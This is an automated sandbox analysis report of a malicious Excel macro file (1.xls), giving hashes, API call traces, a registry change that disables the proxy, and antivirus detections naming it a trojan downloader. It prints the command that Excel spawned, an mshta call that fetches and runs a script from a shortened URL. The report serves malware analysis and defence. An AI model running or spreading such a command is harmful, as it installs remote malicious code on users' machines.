Summary | ZeroBOX

1.xls

Category: FILE
Machine: s1_win7_x6401
Started: Oct. 28, 2021, 9:54 a.m.
Completed: Oct. 28, 2021, 9:57 a.m.
Size 35.5KB
Type Microsoft Excel 2007+
MD5 b1de71a7369b8398d18708df20890588
SHA256 83faecbef924ffbcce0c8939e5b9b4c453699df1cbbebaf11bdb43e8fa42d63e
CRC32 775F1CC1
ssdeep 768:snpoHrkdP32KMgh4p352TRd4i+oufgh8MUpk6TkVQiW:snOHrOPGKbh4X2TDz+ouIGMUpk64Oj
Yara None matched

Name: www.bitly.com
Response: 67.199.248.14
Post-Analysis Lookup:

IP Address: 164.124.101.2
Status: Active
Action: Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

status: 1, return: 1, repeated: 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2072
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6dce1000
process_handle: 0xffffffff
status: 1, return: 0, repeated: 0

NtProtectVirtualMemory

process_identifier: 2072
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6dd3f000
process_handle: 0xffffffff
status: 1, return: 0, repeated: 0

NtProtectVirtualMemory

process_identifier: 2072
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6dd3f000
process_handle: 0xffffffff
status: 1, return: 0, repeated: 0

NtProtectVirtualMemory

process_identifier: 2072
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6dc81000
process_handle: 0xffffffff
status: 1, return: 0, repeated: 0

NtProtectVirtualMemory

process_identifier: 2072
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x65001000
process_handle: 0xffffffff
status: 1, return: 0, repeated: 0

NtProtectVirtualMemory

process_identifier: 2072
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x732d1000
process_handle: 0xffffffff
status: 1, return: 0, repeated: 0

NtAllocateVirtualMemory

process_identifier: 2072
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x058a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
status: 1, return: 0, repeated: 0

NtAllocateVirtualMemory

process_identifier: 2072
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x058a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
status: 1, return: 0, repeated: 0

NtAllocateVirtualMemory

process_identifier: 2072
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x058b0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
status: 1, return: 0, repeated: 0

NtAllocateVirtualMemory

process_identifier: 2072
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x058c0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
status: 1, return: 0, repeated: 0

NtProtectVirtualMemory

process_identifier: 1768
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6f492000
process_handle: 0xffffffff
status: 1, return: 0, repeated: 0

file: C:\Users\test22\AppData\Local\Temp\~$1.xls
Time & API Arguments Status Return Repeated

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x000003a8
filepath: C:\Users\test22\AppData\Local\Temp\~$1.xls
desired_access: 0xc0110080 (FILE_READ_ATTRIBUTES|DELETE|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$1.xls
create_options: 4198496 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_DELETE_ON_CLOSE)
status_info: 2 (FILE_CREATED)
share_access: 1 (FILE_SHARE_READ)
status: 1, return: 0, repeated: 0

cmdline: mshta https://www.bitly.com/kddjkodwkwdokdwi
Time & API Arguments Status Return Repeated

RegSetValueExA

key_handle: 0x000002c8
regkey_r: ProxyEnable
reg_type: 4 (REG_DWORD)
value: 0
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
status: 1, return: 0, repeated: 0

parent_process: excel.exe
martian_process: mshta https://www.bitly.com/kddjkodwkwdokdwi

Lionic Trojan.MSOffice.SLoad.a!c
Elastic malicious (high confidence)
MicroWorld-eScan Trojan.GenericKD.37870613
McAfee RDN/Generic Downloader.x
Cyren X97M/Downldr
Symantec CL.Downloader!gen87
ESET-NOD32 a variant of Generik.GCDOHAC
Avast SNH:Script [Dropper]
Kaspersky UDS:DangerousObject.Multi.Generic
BitDefender Trojan.GenericKD.37870613
NANO-Antivirus Trojan.Ole2.Vbs-heuristic.druvzi
Tencent Mac.Trojan.Macrov.Pfte
Ad-Aware Trojan.GenericKD.37870613
McAfee-GW-Edition BehavesLike.Downloader.nc
FireEye Trojan.GenericKD.37870613
Emsisoft Trojan.GenericKD.37870613 (B)
Ikarus Win32.SuspectCrc
GData Macro.Trojan.Agent.IZNZ5A
Avira HEUR/Macro.Downloader.MRKI.Gen
Microsoft TrojanDownloader:O97M/Obfuse.PLM!MTB
ZoneAlarm HEUR:Trojan-Downloader.MSOffice.SLoad.gen
Cynet Malicious (score: 99)
MAX malware (ai score=89)
Fortinet VBA/Dloader.MRKI!tr
AVG SNH:Script [Dropper]